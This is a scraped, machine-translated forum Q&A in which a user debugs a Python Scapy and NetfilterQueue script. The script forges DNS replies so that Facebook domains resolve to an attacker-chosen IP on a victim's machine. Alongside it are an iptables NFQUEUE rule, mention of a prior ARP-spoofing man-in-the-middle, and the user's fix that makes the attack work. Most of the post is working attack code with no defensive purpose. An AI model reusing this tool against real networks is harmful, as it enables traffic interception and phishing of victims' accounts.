[英]Python dns spoofing dont work nome not resolved
i don't know why mi script don't work, the victim browser shows : ERR: named not resolved. 我不知道为什么mi脚本不起作用,受害者浏览器显示:ERR:命名未解决。
My script 我的剧本
from scapy.all import *
from netfilterqueue import NetfilterQueue
spoofDomain = 'www.facebook.com'
spoofResolvedIp = '172.16.16.162'
queueId = 1
def dnsSpoof(packet):
originalPayload = IP( packet.get_payload() )
if not originalPayload.haslayer(DNSQR):
# Not a dns query, accept and go on
packet.accept()
else:
if ("m.facebook.com" in originalPayload[DNS].qd.qname) or ("facebook.com" in originalPayload[DNS].qd.qname) or ("www.facebook.com" in originalPayload[DNS].qd.qname) or ("edge-chat.facebook.com" in originalPayload[DNS].qd.qname):
print "Intercepted DNS request for " + spoofDomain + ": " + originalPayload.summary()
# Build the spoofed response
spoofedPayload = IP(dst=originalPayload[IP].dst, src=originalPayload[IP].src)/\
UDP(dport=originalPayload[UDP].dport, sport=originalPayload[UDP].sport)/\
DNS(id=originalPayload[DNS].id, qr=1, aa=1, qd=originalPayload[DNS].qd,\
an=DNSRR(rrname=originalPayload[DNS].qd.qname, ttl=10, rdata=spoofResolvedIp))
print "Spoofing DNS response to: " + spoofedPayload.summary()
packet.set_payload(str(spoofedPayload))
packet.accept()
print "------------------------------------------"
else:
# DNS query but not for target spoofDomain, accept and go on
packet.accept()
# bind the callback function to the queue
nfqueue = NetfilterQueue()
nfqueue.bind(queueId, dnsSpoof)
# wait for packets
try:
nfqueue.run()
except KeyboardInterrupt:
print('')
nfqueue.unbind()
I use iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1 command. 我使用iptables -t mangle -I FORWARD -p udp -j NFQUEUE --queue-num 1命令。
Firs i perform a man in the middle attack by ARP Cache spoofing. 首先,我通过ARP Cache欺骗在中间攻击中扮演一个男人。 I used wireshark to see the traffic and it seems to be ok, I don't know whats is going on.
我用Wireshark来查看流量,这似乎还可以,我不知道发生了什么。
I solved the problem, I was looking for queries I don't see that sorry 我解决了这个问题,我在寻找查询,但没有看到抱歉
if not originalPayload.haslayer(DNSQR)
DNSQR is dns query, and I want to take dns answers, so the code is that: DNSQR是dns查询,我想获取dns答案,因此代码是:
if not originalPayload.haslayer(DNSRR)
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.